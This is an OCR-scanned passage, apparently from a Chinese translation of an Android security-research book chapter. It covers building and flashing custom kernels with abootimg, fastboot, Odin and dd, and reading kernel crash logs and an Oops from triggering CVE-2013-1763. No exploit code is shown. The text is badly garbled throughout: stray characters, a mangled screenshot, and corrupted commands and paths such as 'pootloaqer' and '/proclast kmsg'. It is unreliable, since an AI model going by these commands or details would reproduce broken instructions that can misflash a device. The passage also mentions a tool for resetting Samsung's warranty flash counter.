Writing Boot Image cur-boot.img 


上 面 的 命令 展示 了 如 何 使 用 abootimg 的 -u 选项 来 更 新 boot 镜像， 可 以 实现 将 原本 的 内 核 
更 换 成 你 自己 的 内 核 。 也 可 以 使 用 --create 选项 把 内 核 、initrd 和 可 选 的 第 二 步 引 导 装 配 成 boot 
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镜像 。 如 果 内 核 或 者 initrd 文件 变 大 了 ， 那 么 abootimg 命令 会 给 出 如 下 错误 消息 : 


dev: 


~/android/src/kernel/omap/staging $ abootimg --create new-boot.img -f \ 


bootimg.cfg -k bigger-zImage -r initrd.img 
reading config file bootimg.cfg 

reading kernel from bigger-zImage 

reading ramdisk from initrd.img 


new- 


boot.img: updated is too big for the Boot Image (4534272 vs 4505600 bytes) 


只 需 使 用 -c 选项 或 更 新 abootimg 配置 文件 bootimg.cfg 中 的 bootsize 参数 就 能 解决 这 


个 错误 。 


dev: 





~/android/src/kernel/omap/staging $ abootimg --create new-boot.img -f \ 


bootimg.cfg -k bigger-zImage -r initrd.img -c "bootsize=4534272" 
reading config file bootimg.cfg 

reading Kernel from bigger-zImage 

reading ramdisk from initrd.img 

Writing Boot Image new-boot.img 


对 于 三 星 Galaxy S I 手机， 操作 步骤 几乎 是 一 样 的 。 与 Nexus 家 族 的 设备 一 样 ， 可 以 从 设 


备 中 获 和 














导 引 导 镜 像 或 者 原 厂 镜像 。 这 次 通过 在 SamFirmware 网 站 检索 设备 型 号 , 下 载 到 原 厂 镜像 





KIES HOME L710VPBMD4 L710SPRBMD4 1130792 REV03_user low_ship.tar.md5。 这 个 镜像 
应 该 与 用 来 升级 设备 的 镜像 相同 。 可 以 按照 如 下 命令 来 提取 固件 镜像 和 引导 镜像 : 


dev: 
dev: 
dev: 
dev: 





~/sgs3-md4 $ mkdir stock 

~/sgs3-md4 $ tar xf KIES*MD4*.tar.md5 -C stock 
~/sgs3-md4 S mkdir boot && cd $_ 
~/sgs3-md4/boot $ abootimg -x ../stock/boot.img 


writing boot image config in bootimg.cfg 
extracting kernel in zImage 
extracting ramdisk in initrd.img 


boot.img 提取 成 功 后 ， 编 译 自 定义 引导 镜像 所 需 的 准备 就 已 经 全 部 作 好 了 。 使 用 aboot img 
命令 进行 如 下 操作 即 可 : 


dev: 
dev: 


























~/sgs3-md4/boot $ mkdir ../staging 
~/sgs3-md4/boot $ abootimg --create ../staging/boot.img -f bootimg.cfg \ 


-K ~/sph-1710/kernel/arch/arm/boot/zImage -r initrd.img 

reading config file bootimg.cfg 

reading kernel from /home/dev/sph-1710/kernel/arch/arm/boot/zImage 
reading ramdisk from initrd.img 

Writing Boot Image ../staging/boot.img 


10.3.7 


引导 自 定义 内 核 


编译 成 功 后 ， 内 核 编 译 系 统 会 把 内 核 镜像 写 人 arch/arm/boot/zImage。 可 以 通过 多 种 方法 , 在 

















设备 上 3 








| 导 这 个 新 编译 的 内 核 。 这 跟 Android 的 其 他 方面 类 似 , 使 用 的 方法 依赖 于 特定 设备 。 本 




















节 内 容 涵盖 了 4 种 方法 : 两 种 使 用 fastboot 协议 ,一 种 使 用 OEM 专 有 下 载 协议 ， 另 一 种 直接 在 
设备 上 操作 。 





10.3 ”运行 自 定 义 内 核 代 码 259 





1. 使 用 fastboot 

用 fastboot 启动 新 编译 的 内 核 有 两 种 方法 。 以 AOSP 支持 的 设备 为 例 ， 既 可 以 直接 启动 
boot.img， 也 可 以 将 其 写 入 设备 的 boot 分 区 。 第 一 种 方法 更 好 ， 因 为 如 果 失 败 ， 只 需要 重启 就 能 
恢复 ; 但 是 并 非 所 有 设备 都 支持 这 种 方法 。 第 二 种 方法 是 持续 性 的 , 适用 于 设备 需要 多 次 重启 的 
情形 。 不 六 的 是 ， 两 种 方法 都 需要 解锁 设备 的 boot loader。 必 须 重启 设备 进入 fastboot 模 式 ， 如 
下 所 示 : 


dev:~/android/src/kernel/omap/staging $ adb reboot bootloader 


这 个 命令 执行 后 ， 相 应 设备 会 重启 进入 bootloader， 然 后 打开 fastboot 模式 。 在 这 种 模式 下 ， 
设备 会 在 屏幕 上 显示 一 个 Bugdroid 和 “FASTBOOT MODE” 字 样 。 


























警告 ”解锁 boot loader 会 让 设备 的 保修 条 款 失 效 。 一 个 误 操作 就 可 能 导致 设备 永久 无 法 使 用 ， 
所 以 要 非常 小 心 。 





第 一 种 方法 使 用 fastboot 工具 中 的 boot 命令 ， 能 直接 引导 新 创建 的 boot.img 文件 。 这 种 方 
法 和 第 3 章 中 描述 的 启动 自 定义 恢复 基本 相同 。 唯 一 的 差别 是 ， 使 用 的 是 boot.img， 而 不 是 
recovery.img。 下 面 是 相关 命令 : 


























dev:~/android/src/kernel/omap/staging $ fastboot boot new-boot.img 

[.. device boots ..] 

dev:~/android/src/kernel/omap/staging $ adb wait-for-device shell cat \ 
/proc/version 

Linux version 3.0.31-g9f818de-dirty (jdrake@dev) (gcc version 4.7 (GCC) )... 


重启 设备 到 bootloader 后 ， 使 用 fastboot boot 来 引导 bootimg， 然 后 打开 shell 来 确认 修 
改 后 的 内 核 正 在 运行 。 
第 二 种 方法 使 用 fastboot flash 命令 更 持久 地 将 新 创建 的 bootimg 写 入 设备 的 boot 分 区 。 
命令 如 下 : 


dev:0:~/android/src/kernel/omap/staging $ fastboot flash boot new-boot.img 
boot new-boot.img 

sending 'boot' (4428 KB)... 

OKAY [ 二 :在 了 人 

writing 'boot'... 

OKAY [ 1.121s] 

finished. total time: 2.800s 

dev:0:~/android/src/kernel/omap/staging $ fastboot reboot 

rebooting... 
finished. total time: 0.006s 

dev:0:~/android/src/kernel/omap/staging $ adb wait-for-device shell 
shell@android:/ $ cat /proc/version 

Linux version 3.0.31-g9f818de-dirty (jdrake@dev) (gcc version 4.7 (GCC) )... 


执行 fastboot flash boot 命令 后 ， 重 启 设 备 进 入 shell， 可 以 确认 修改 后 的 内 核 正 在 


运行 。 
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2. 使 用 OEM Flashing 工具 

刷 和 人 OEM 设备 boot 分 区 的 步 又 对 于 不 同 设 备 是 不 同 的 ， 而 且 并 非 所 有 设备 都 可 行 。 例 如 ， 
一 些 OEM 设备 的 boot loader 被 锁 住 并 无 法 解锁 ， 还 有 一 些 设备 拒绝 刷 入 未 签名 的 boot.img。 本 
节 介绍 如 何在 三 星 Galaxy S II 中 刷 入 自 定义 内 核 。 








注意 ”对 于 root 后 的 设备 ， 使 用 kexec 程序 来 解决 签名 问题 也 许 是 可 能 的 。kexec 程序 会 从 一 个 
已 启动 的 系统 上 来 启动 Linux 内 核 。 使 用 kexec 的 细节 超出 了 本 章 范 围 。 


尽管 Sprint 版 的 三 星 Galaxy S II 会 使 用 密码 学 的 方法 来 验证 boot.img, 但 并 不 会 阻止 刷 人 或 
启动 一 个 未 签名 的 内 核 副 本 。 它 只 有 一 个 内 部 计数 器 来 记录 自 定 义 镜 像 刷 入 的 次 数 。 在 启动 设备 
进入 下 载 模式 时 ， 这 个 数字 会 在 屏幕 上 显示 , 在 本 节 后 面 可 以 看 到 。 三 星 使 用 这 个 计数 器 来 判断 
是 否 使 用 了 非 官方 的 代码 而 导致 设备 的 保修 条 款 失 效 。 现 在 我 们 知道 ， 刷 入 未 签名 的 boot.img 
不 会 让 你 的 设备 变 砖 ， 那么 就 可 以 开始 刷机 并 启动 。 



































注意 ”Chainfire 针对 三 星 制作 了 一 个 名 为 TriangleAway 的 工具 ， 用 来 清空 刷机 计数 器 。 它 适用 
于 大 部 分 机 型 。 这 只 是 Chainfire 制作 的 许多 工具 之 一 ， 还 有 知名 的 SuperSU。Chainfire 
的 项 目 可 以 在 http://chainfire.eu/ 找 到 。 


与 其 他 OEM 设备 相同 ， 三 星 Galaxy S II 并 不 支持 fastboot 模式 。 然 而 ， 它 支持 一 种 可 以 与 
fastboot 媲美 的 专 有 下 载 模式 。 我 们 以 这 个 模式 为 例 ， 结 合 相应 的 专 有 刷机 工具 ， 写 和 人 新 创建 的 
boot.img。 

对 三 星 设备 进行 刷机 的 官方 工具 是 Odin 工具 。 事实 上 , 据 传 Odin 是 三 星 内 部 人 员 使 用 的 工 
有 具 。 其 使 用 过 程 与 Nexus 设备 非常 相似 。 首 先 将 设备 切换 到 下 载 模式 ， 如 下 所 示 : 


dev:~/sgs3-md4/boot $ cd ../staging 
dev:~/sgs3-md4/staging $ adb reboot bootloader 


现在 设备 已 经 可 以 接受 镜像 了 ， 但 是 有 一 个 问题 : Odin 不 接受 原始 boot 镜像 作为 输入 ， 而 
是 采用 与 原 厂 镜像 相同 的 .tar.md5 格式 。 要 让 Odin 接受 boot.img， 就 必须 了 解 生成 该 格式 文件 的 
细节 。 另 外 ， 还 需要 增加 镜像 的 MD5， 用 作 完 整 性 检查 ， 这 也 使 得 它 能 够 将 多 个 分 区 镜像 打包 
成 一 个 文件 。 打 包 boot 镜像 ( 包括 自 定义 内 核 ) 的 命令 如 下 : 


dev:~/sgs3-md4/staging $ tar -H ustar -c boot.img > boot.tar 
dev:~/sgs3-md4/staging $ ( cat boot.tar; md5sum -t boot.tar ) > boot.tar.md5 


准备 工作 已 经 完成 了 ， 但 是 还 有 一 个 问题 : Odin 只 适用 于 Windows， 不 在 本 例 的 Ubuntu 环 
境 中 运行 。 开 源 工具 Heimdall 可 以 解决 这 个 问题 ， 但 是 无 法 与 SPH-L710 一 起 工作 。 不 幸 的 是 ， 
需要 将 boot.tar.md5 文件 复制 到 Windows 机 器 ， 然 后 使 用 Administrator 权限 来 运行 Odin。Odin 
运行 后 , 勾 选 PDA 旁边 的 复 选 框 。 选择 boot.tar.md5 文件 的 路 径 并 打开 它 。 在 按 住 开 机 键 的 同时 ， 
按 下 音量 向 下 键 和 Home 键 ， 或 者 使 用 adb reboot pootloaqer 命令 ， 将 设备 引导 至 下 载 模 
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式 。 和 警告 窗口 出 现 后 ， 按 音量 向 上 键 继 续 。 在 下 载 模式 时 ， 屏 幕 会 显示 一 些 状态 ， 包 括 自 定义 
文件 刷机 次 数 。 然 后 ,将 设备 连 入 Windows 电脑 。 这 时 候 Odin 如 图 10-3 所 示 。 
[而 Odin3 v3.07 le 证 寺 


























[ a aE EE 引 必 本 引 E 上 | 





























































































































0:[coM3] 
Option Re-Partition 
|] Auto Reboot [| Re-Partition WV] F. Reset Time PIT 
问 Flash Lodk 回 LED Control [Nand Erase Al 
同 THash Files [Download] 
一 一 图 Bootloader 
Lj Dump AP RAM 习 
-一 加 PDA C:WUsersWdrakeWboottar.md5 
DD Phone Bootloader Update 。 [] Phone EFS Clear 
四 PHONE 
口 ls 
口 UMS 
<OSM> Leave CS.. _File [Dump] 
. | 厂 
| Start | | Reset | | Exit | 























图 10-3” ”Odin 准备 刷 入 boot 





点 击 Start 按钮 开始 刷 入 boot 分 区 。 如 果 勾 选 了 自动 重启 ( Auto Reboot ) 选项 ， 那 么 设备 在 
刷机 完成 后 会 自动 重启 。 一 旦 重启 完毕 ， 就 可 以 安全 地 将 设备 连 入 开发 机 ， 并 按 如 下 方式 确认 : 


shell@android:/ $ cat /proc/version 
Linux version 3.0.31 (jdrake@dev) (gcc version 4.6.x-google 20120106 


3. 直接 写 分 区 

除了 使 用 fastboot 或 OEM 刷机 工具 ， 还 可 以 直接 往 boot 分 区 写 人 自 定义 boot 镜 像 。 这 种 方 
法 的 主要 好 处 是 无 需 重 启 设 备 。 例 如 ，Chainfire 的 MobileOdin 应 用 就 使 用 这 个 方法 来 刷机 ， 不 
需要 另外 的 电脑 。 总 的 来 说 ， 这 种 方法 更 加 快速 简便 ， 因 为 步骤 较 少 ， 并 且 不 需要 额外 的 工具 。 

然而 ， 这 种 方法 有 一 些 额外 要 求 , 也 存在 一 些 潜在 问题 ， 都 需要 考虑 到 。 第 一 ， 这 种 方法 只 
适用 于 被 root 的 机 器 上 。 没 有 root 权限 的 话 ， 就 只 能 写 人 boot 分 区 的 块 设备 。 第 二 ， 必 须 考虑 
引导 级 别 的 限制 ， 这 可 能 会 导致 该 方法 失败 。 如 果 boot loader 拒绝 引导 未 签名 的 boot 镜像 ， 就 
会 让 手机 变 砖 。 第 三 ， 必须 精确 地 确定 应 该 使 用 哪个 块 设备 。 这 点 往往 比较 困难 ,判断 失误 会 带 
来 潜在 的 灾难 。 如 果 写 人 的 错误 的 分 区 ， 可 能 会 让 设备 变 砖 ， 并 且 无 法 复原 。 

在 案例 分 析 的 两 个 设备 中 ,bootloader 并 不 需要 解锁 。 虽然 三 星 Galaxy S II 会 检测 签名 ， 然 
后 增加 自 定义 刷机 计数 ， 但 是 不 会 阻止 引导 未 签名 的 boot 镜像 。Galaxy Nexus 完全 不 验证 签名 。 
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应 该 区 别 对 待 不 同 的 设备 ， 如 下 所 示 。 
在 Galaxy Nexus 上 : 


dev:~/android/src/kernel/omap/staging $ adb push new-boot .img /data/local/tmp 
2316 KB/s (4526080 bytes in 1.907s) 

dev:~/android/src/kernel/omap/staging $ adb shell 
shell@android:/data/local/tmp $ exec su 

root@android:/data/local/tmp # dd if=boot.img \ 
of=/dev/block/platform/omap/omap_hsmmc.0/by-name/boot 

8800+0 records in 

8800+0 records out 

4505600 bytes transferred in 1.521 secs (2962261 bytes/sec) 
root@android:/data/local/tmp # exit 

dev:~/android/src/kernel/omap/staging $ adb reboot 
dev:~/android/src/kernel/omap/staging $ adb wait-for-device shell cat \ 
/proc/version 

Linux version 3.0.31-g9f818de-dirty (jdrake@dev) (gcc version 4.7 (GCC) )... 


注意 使 用 这 种 方法 时 ,没有 必要 在 boot 镜 像 后 面 加 上 MD5， 这 只 适用 于 Odin。 


在 三 星 Galaxy S II 上: 


dev:~/sgs3-md4 $ adb push boot .img /data/local/tmp 

2196 KB/s (5935360 bytes in 2.638s) 

dev:~/sgs3-md4 $ adb shell 

shell@android:/data/local/tmp $ exec su 
root@android:/data/local/tmp # dd if=boot.img \ 
of=/dev/block/platform/msm_ sdcc.1/by-name/boot 

11592+1 records in 

11592+1 records out 

5935360 bytes transferred in 1.531 secs (3876786 bytes/sec) 
root@android:/data/local/tmp # exit 

dev:~/sgs3-md4 $ adb reboot 

dev:~/sgs3-md4 $ adb wait-for-device shell cat /proc/version 
Linux version 3.0.31 (jdrake@dev) (gcc version 4.6.x-google 20120106 


每 种 情况 下 ， 都 使 用 ADB 将 镜像 复制 到 设备 中 ， 然 后 使 用 aa 命令 直接 写 入 boot 分 区 。 命 
令 执行 完成 后 ， 重 启 设 备 并 打开 shell， 确 认 自 定义 内 核 已 经 被 使 用 。 


10.4 ”调试 内 核 


要 让 内 核 漏洞 变 得 有 价值 ,就 需要 深入 了 解 操作 系统 的 内 部 工作 机 理 。 触 发 内 核 漏洞 会 导致 
很 多 非 预期 的 行为 ,包括 panic .hang 和 内 存 破坏 。 多 数 情况 下 ,触发 的 内 核 漏洞 会 导致 内 核 panic， 
进而 系统 重启 。 为 了 理解 问题 根源 ， 调 试 工具 是 非常 重要 的 。 

幸运 的 是 ，Android 所 用 的 Linux 内 核 包 含 了 多 个 调试 工具 。 可 以 用 多 种 方法 来 调试 月 演 ， 
具体 方法 取决 于 用 于 测试 的 设备 。 在 开发 利用 程序 时 , 追踪 和 在 线 调试 能 够 帮助 开发 人 员 理 解 一 
些微 妙 的 难点 。 本 节 涵 盖 调试 工具 相关 的 内 容 ， 提 供 了 详细 的 使 用 案例 。 
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10.4.1 获取 内 核 朋 演 报 告 


大 部 分 Android 设备 在 发 生 内 核 错误 时 都 会 重启 ,这些 错 误 不 仅 可 能 是 内 存 访问 错误 ,也 可 
能 是 内 核 断言 bug 或 条 件 错误 , 这 些 行为 会 干扰 安全 研究 。 幸 运 的 是 , 存在 几 种 方式 来 处 理 骨 溃 ， 
并 获取 有 用 的 骨 溃 信息 。 

在 重启 之 前 ，Linux 内 核 会 向 内 核 日 志 发 送 盘 溃 的 相关 信息 。 通 过 shell 执行 amesg 命令 可 
以 访问 这 个 日 志 。 除 了 amesg, 也 可 以 使 用 proc 文件 系统 中 的 kmsg 来 连续 查看 内 核 日 志 , 完整 
路 径 是 /proc/kmsg。 

如 果 没 有 root 权限 ， 可 能 无 法 使 用 这 些 工具 。 在 大 多 数 设 备 上 ，/proc/kmsg 被 限制 为 仅 智能 
root 用 户 或 者 root 用 户 组 才能 访问 ， 更 老 的 设备 只 允许 root 用 户 访问 。 另 外 ,第 12 章 讨 论 的 
dmesg_restrict 参数 可 以 把 amesg 命令 限制 为 root 用 户 访问 。 

除了 在 线 内 核 日 志 以 外 , Android 还 提供 了 一 种 工具 , 可 以 在 设备 成 功 重启 后 获取 崩 淡 信息 。 
在 支持 CONFIG_ANDROID_RAM_CONSOLE 选项 的 设备 中 ， 内 核 日 志 可 以 在 重启 之 前 通过 proc 文 
件 系统 的 1ast_kmsg 获得 ,完整 路 径 是 /proclast kmsg。 与 dmesg 和 kmsg 不 同 , 它 不 需要 root 
权限 。 尝 试 利用 未 知 的 内 核 漏洞 来 首次 获得 设备 的 root 权限 时 ， 这 个 方法 就 很 有 优势 了 。 

还 能 通过 查看 Android 设备 来 找到 其 他 相关 目录 , 其 中 一 个 是 /data/dontpanic 目录 。 许多 设备 
的 initrc 脚本 包含 一 些 命令 ,能 够 将 proc 文件 系统 中 的 一 些 项 复制 到 这 些 目 录 。 搭 载 Android 2.3.4 
的 Verizon 版 摩托 罗拉 Droid 3 中 的 init .rc 如 下 所 示 : 

shell@cdma_solana:/# grep -n 'copy.*dontpanic' /init* 

/init.mapphone_cdma.rc:136: COPY /proc/last_kmsg /data/dontpanic/last_kmsg 

/init.mapphone_cdma.rc:141: copy /data/dontpanic/apanic console 

/data/logger/last_apanic console 

FS 


LL. es copy /proc/apanic_console /data/dontpanic/apanic console 
/Lt EES: copy /proc/apanic_ threads /data/dontpanic/apanic threads 




































































在 这 个 例子 中 ，last_kmsg、apcanic_console 和 apanic_threads 这 三 个 proc 项 被 复 
制 了 。 后 两 个 在 大 多 数 Android 设备 中 是 不 存在 的 ， 所 以 对 调试 没有 帮助 。 除 了 /data/dontpanic， 
还 用 到 了 另外 一 个 目录 /data/logger。 查 看 不 同 设备 的 initrc 文件 可 以 找到 更 多 其 他 目录 ,但 是 不 
如 直接 访问 /proc/kmsg 和 /proc/last_kmsg 有 效 。 

最 后 一 种 方法 可 以 用 来 防止 设备 内 核 出 错 后 重启 。Linux 内 核 有 几 个 运行 时 配置 参数 ， 可 以 
用 于 在 产生 问题 后 系 控制 统 的 操作 。 首 先 ，/proc/sys/kernel/panic 项 控制 了 panic 发 生 后 ， 系 统 等 
待 多 少 秒 才 重启 。Android 设备 通常 设置 为 1 或 5 秒 ， 如 果 设 置 为 0， 系 统 就 不 会 重启 。 























警告 修改 系统 panic 之 后 的 默认 操作 要 小 心 。 尽管 政 为 不 重启 是 理想 的 方法 , 但 是 内 核 错 误 发 
生 后 如 果 继 续 运行 ， 可 能 会 导致 数据 损失 ,或许 更 糟 。 


shell@android:/ $ cat /proc/sys/kernel/panic 
全 
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shell@android:/ $ su -c 'echo 0 > /proc/sys/kernel/panic' 
shell@android:/ $ cat /proc/sys/kernel/panic 
0 


/proc/sys/kernel/panic_on_oops 项 控制 Oops( 下 一 节 讨 论 ) 是 否 会 触发 panic。 这 个 选项 是 默 
认 开 启 的 ， 如 下 方式 可 以 关闭 它 : 
shell@android:/ $ cat /proc/sys/kernel/panic_ on_ oops 
1 
shell@android:/ $ su -c 'echo 0 > /proc/sys/kernel/panic_ on _ oops' 


shell@android:/ $ cat /proc/sys/kernel/panic_ on _ oops 
0 


用 这 些 方法 就 能 够 获得 内 核 骨 溃 信息 。 现 在 ， 必 须 理解 内 核 空间 发 生 的 问题 












































10.4.2 理解 Oops 信息 


内 核 骨 溃 信 息 通常 被 称 为 Oops。Oops 实际 上 就 是 一 个 骨 溃 dump 文件 ， 包 含 通用 的 分 类 信 
息 、 寄 存 器 值 、 寄 存 器 指向 的 数据 、 加 载 模 块 以 及 栈 回 漳 信 息 。 并非 任 何 时候 都 能 获得 这 些 信 息 ， 
例如 ， 如 果 栈 顶 指针 被 破坏 ， 就 不 可 能 建立 一 个 正确 的 栈 回 湖 。 本 节 分 析 了 运行 Android 4.2.2 
系统 的 Nexus 4 上 的 一 个 Oops 消息 。 这 个 Oops 的 全 部 内 容 可 以 从 本 书 的 附加 材料 中 下 载 : 
http://www.wiley.com/go/androidhackershandbook/。 








注意 本 节 使 用 的 内 核 包 含 LG 电子 公司 所 作 的 修改 ， 所 以 其 他 设备 上 可 能 没有 一 部 分 信息 。 


这 个 Oops 发 生 在 触发 CVE-2013-1763 的 时 候 ， 该 漏洞 位 于 sock_gdiag_lock_handler 恩 
数 。 详 细 信息 参阅 本 章 后 面 案例 研究 的 “sock diag” 部 分 。 这 里 我 们 不 关注 漏洞 ， 而 是 重点 关注 
如 何 理解 Oops 消息 本 身 。 

Oops 的 第 一 行 表示 内 核 尝 试 访问 未 映射 的 内 存 ， 由 /arm/mm/fault.c 中 的 _ gdo_kernel_fault 
函数 生成 。 


Unable to handle kernel paging request at virtual address 00360004 


内 核 尝 试 读 取 用 户 空间 的 地 址 0x00360004。 由 于 在 这 个 地 址 上， 用户 空间 的 进程 中 没有 任 
何 内 存 映 射 ， 所 以 产生 了 页 错误 。 

第 二 和 第 三 行 跟 页 表 项 有 关 ， 由 show_ptr 函数 生成 ， 这 个 函数 也 在 arch/arm/mm/fault.c 
中 。 


pgd = e9ad08000 
[00360004] *pgd=00000000 


第 二 行 显示 了 页 全 局 目录 (PGD ) 的 地 址 ， 而 第 三 行 显示 了 访问 地 址 以 及 地 址 对 应 PGD 中 
的 值 。 这 里 ，*pga 的 值 为 0x00000000， 表 明 这 个 地 址 没有 被 映射 。 

页 表 有 许多 用 处 ， 主 要 用 于 把 虚拟 内 核 转 换 成 物理 内 存 地 址 ， 还 可 以 用 来 追踪 内 存 权限 和 
swap 状态 。 在 32 位 的 系统 中 ， 页 表 也 用 来 管理 全 系统 的 物理 内 存 使 用 (超出 地 址 空间 一 般 的 允 
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许 范 围 )。 这 使 得 32 位 系统 可 以 使 用 超过 4GB 的 RAM， 尽 管 单个 32 位 的 进程 无 法 编制 所 有 内 
存 空 间 。 可 以 在 Understanding the Linux Kernel 第 3 版 中 找到 更 多 关于 页 表 和 页 错误 处 理 的 相关 
言 息 ， 也 可 以 参考 Linux 内 核 源 代码 中 的 Documentation/vm 目录 。 

在 页 表 信息 后 ，Oops 消息 包含 了 一 行 有 用 的 信息 : 

Internal error: Oops: 5 [#1] PREEMPT SMP ARM 

尽管 只 有 一 行 ， 但 它 包含 了 很 多 信息 。 这 行 消息 由 /arm/kernel/traps.c 中 的 __qdie 函数 触发 。 
字符 串 的 第 一 部 分 Internal error 为 内 核 源 代码 中 的 静态 字符 串 。 第 二 部 分 oops 是 调用 了 
数 传人 的 参数 。 其 他 调用 点 使 用 不 同 的 字符 串 指出 发 生 了 何 种 错误 。 下 一 个 部 分 5 表明 了 __aie 
函数 的 运行 次 数 , 但 是 还 不 明确 为 何 会 显示 数字 5。 其 余部 分 显示 了 内 核 编译 时 使 用 的 一 些 选 项 : 
抢占 式 多 任务 ( PREEMPT )、 对 称 多 处 理 结构 ( SMP ) 和 ARM 架构 。 

后 面 的 几 行 消息 由 arch/arm/kernel/process.c 中 的 __show_regs 图 数 生成 。 这 部 分 是 Oops 消 
息 中 最 重要 的 信息 ， 从 中 可 以 找到 内 核 是 在 哪里 崩 演 的 ， 以 及 月 演 时 CPU 处 于 何 种 状态 。 下 面 
这 行 消息 显示 了 错误 发 生 时 的 CPU 序号 。 

CPU: 0 Not tainted (3.4.0-perf-g7cellcd ind#1) 

CPU 序号 之 后 的 域 显示 了 内 核 是 否 被 污染 。 这 里 的 内 核 没 有 被 污染 ; 如 果 被 污染 了 了 ,就 会 显 
示 Tainted， 并 在 后 续 的 几 个 字符 中 给 出 内 核 如 何 被 污染 的 信息 。 

紧 接着 的 两 行 显示 了 内 核 代码 段 出 错 的 位 置 : 


PC is at sock_ diag_rcv_msg+0x80/0xb4 
LR is at sock_ diag_ rcv_msg+0x68/0xb4 


这 两 行 显示 了 pc 和 1r 寄存 器 的 符号 值 ， 分 表 代 表 了 当前 代码 的 位 置 及 其 调用 函数 。 使 用 
print_symbol 函数 来 获取 符号 名 字 。 如 果 找 不 到 符号 ， 就 会 显示 寄存 器 值 。 利 用 这 个 值 ， 能够 
使 用 IDA pro 或 者 attach 上 的 内 核 调试 器 找到 出 错 代码 的 位 置 。 

接 下 来 的 5 行 包含 了 所 有 寄存 器 的 信息 : 

pc : <c066ba8c> lr <a066ba743 psr: 20000013 

sp : ecf7dcd0 ip : 00000006 fp : ecf7debc 

r10: 00000012 r9 : 00000012 r8 : 00000000 


r7 : ecf7dd04 rr6 : c108bb4c r5 : ea9d6600 Ir4 : ee2bb600 
r3 : 00360000 Ir2 : ecf7dcc8 rl1 : ea9dé6600 rr0 : code8clc 


上 面 的 行 包含 了 每 个 寄存 器 的 数值 。 这 些 值 对 于 跟踪 代码 骨 江 前 的 指令 非常 有 用 , 尤其 是 与 
Oops 消息 当中 的 内 存 内 容 信 息 相 结 合 。 上 面 的 最 后 一 行 信息 显示 了 很 多 编码 后 的 标志 : 

Flags: nzCv IRQs on FIQs on Mode SVC 32 ISA ARM Segment user 

这 些 标志 被 解码 成 了 人 类 可 读 的 表示 形式 。 第 一 组 是 nzcv， 对 应 于 算数 逻辑 单元 (ALU ) 
中 cpsr 寄存 器 的 状态 标志 。 如 果 这 个 标志 位 被 置 1, 就 用 大 写字 母 显示 ,否则 用 小 写字 母 显示 。 
在 这 个 Oops 消息 中 ， 进 位 标志 位 被 置 1， 但 是 负数 、 零 和 溢出 标志 位 被 置 0。 

ALU 状态 标志 信息 之 后 ， 显 示 了 中 断 或 快速 中 断 是 否 被 开启 。 接 着 ， 显 示 了 发 生前 溃 时 处 
理 器 处 在 什么 模式 。 由 于 甬 溃 发 生 在 内 核 空间 中 ， 所 以 这 里 显示 的 是 svc_32。 接 下 来 的 两 个 词 
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代表 崩溃 时 使 用 的 指令 集体 系 架 构 ( ISA )。 最 后 ，Segment 信息 表示 当前 的 段 为 内 核 空 间 的 内 
存 还 是 用 户 空间 的 内 存 。 这 个 例子 中 是 用 户 空间 , 这 是 一 个 很 危险 的 信号 ， 因为 内 核 应 该 严禁 访 
问 用 户 空间 中 未 映射 的 内 存 。 

下 一 行 由 __show_regs 函数 生成 ,包含 了 ARM 处 理 器 的 一 些 特定 的 信息 。 

Control: 10c5787d Table: aa70806a DAC: 00000015 


这 里 出 现 了 三 个 属性 : 控制 、 表 和 DAC， 分别 对 应 于 特殊 的 ARM 特权 寄存 器 c1 、c2 和 
c3。cl 寄存 器 是 ARM 处 理 器 的 控制 寄存 器 ， 用 于 进行 底层 的 设置 ， 例 如 内 存 对 齐 、 绥 在 和 终 
端 等 。c2 寄存 器 用 于 转换 表 基 址 寄存 器 TTBR0 ( Translation Table Base Register )， 存 储 了 第 一 
页 表 的 地 址 。c3 寄存 器 用 于 域 访问 控制 (DAC，Domain Access Control ) 寄存 器 ， 指 定 了 最 多 16 
个 域 的 权限 等 级 ， 每 个 等 级 有 两 个 控制 位 。 每 个 域 可 以 为 用 户 空间 或 者 内 核 空 间 设置 访问 权限 。 

在 随后 的 部 分 中 , show_extra_register_gdata 限 数 打印 的 消息 包含 了 通用 寄存 器 指向 的 
虚拟 内 存 中 的 内 容 。 如 果 寄 存 器 指向 的 不 是 一 个 已 映射 的 地 址 ， 就 会 被 忽略 , 或 是 在 应 为 数据 内 
容 的 地 方 出 现 星 号 标记 。 

PC: 0xc066ba0c : 
ba0c ee92d4070 ela04000 eldq130b4 ela05001 e3530012 3a000021 e3530013 9a000002 
a 
b9f4 eb005564 ela00004 e8bd4038 ea052f6a c0de8c08 c066ba0c e92d4070 ela04000 
Se 


dc50 co0df1040 00000002 c222a440 00000000 00000000 c00f5d14 00000069 epb2c71a4 
ja 


对 于 每 个 寄存 器 中 的 地 址 ， 从 之 前 128 字 节 的 位 置 开始 ， 一 共 显示 256 字 节 的 内 存 。PC 寄 
存 器 和 LR 寄存 器 指向 的 内 存 尤 其 有 用 ， 特 别 是 与 Linux 内 核 源 代码 中 提供 的 decodecode 脚本 工 
具 相 结合 。 ee 10.5.3 的 “sock diag” 漏 洞 部 分 中 用 到 。 

在 内 存 信息 之 后 ，_ die 函数 详细 显示 了 触发 错误 的 进程 。 


Process sock_diag (pid: 2273, stack limit = 0xecf7c2f0) 

Stack: (Oxecf7dcd0 to Oxecf7e000) 

deeO0:: ea9d6600 ee2bb600 c066ba0c c0680fdc 
dce0: c0de8c08 ee2bb600 ea065000 c066b9f8 c066b9d8 ef166200 ee2bb600 c067fc40 
dq00: ea065000 7fffffff 00000000 ee2bb600 ea065000 00000000 ecf7df7c ecf7dd78 
| 


一 行 显示 了 进程 名 、 进 程 ID 和 内 核 栈 顶 信息 。 对 于 某 些 进程 ， 这 个 函数 也 会 显示 内 核 栈 
从 栈 顶 sp 一 直到 栈 低 的 数据 。 之 后 是 调用 栈 回 溯 信 息 ， 如 下 所 示 : 

























































































<c066ba8c>] (sock_diag_rcv_ msg+0x80/0xb4) from [<c0680fdc>] 
netlink_ rcv_skb+0x50/0xac) 

<c0680fdc>] (netlink_ rcv_skb+0x50/0xac) from [<c066b9f8>] 
sock_diag_rcv+0x20/0x34) 

<C066b9f8>] (sock_ diag_ rcv+0x20/0x34) from [<c067fc40>] 
netlink unicast+0x1l4c/0xle8) 

<c067fc40>] (netlink unicast+0xl4c/0xle8) from [<c06803a4>] 


[ 
( 
[ 
( 
[ 
( 
[ 
(netlink_ sendmsg+0x278/0x310) 
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[<c06803a4>] (netlink_ sendmsg+0x278/0x310) from [<c064a20c>] 
(sock_sendmsg+0xa4/0xc0) 

[<c064a20c>] (sock_sendmsg+0xa4/0xc0) from [<c064a3f4>] 
(__sys_sendmsg+0xlcc/0x284) 
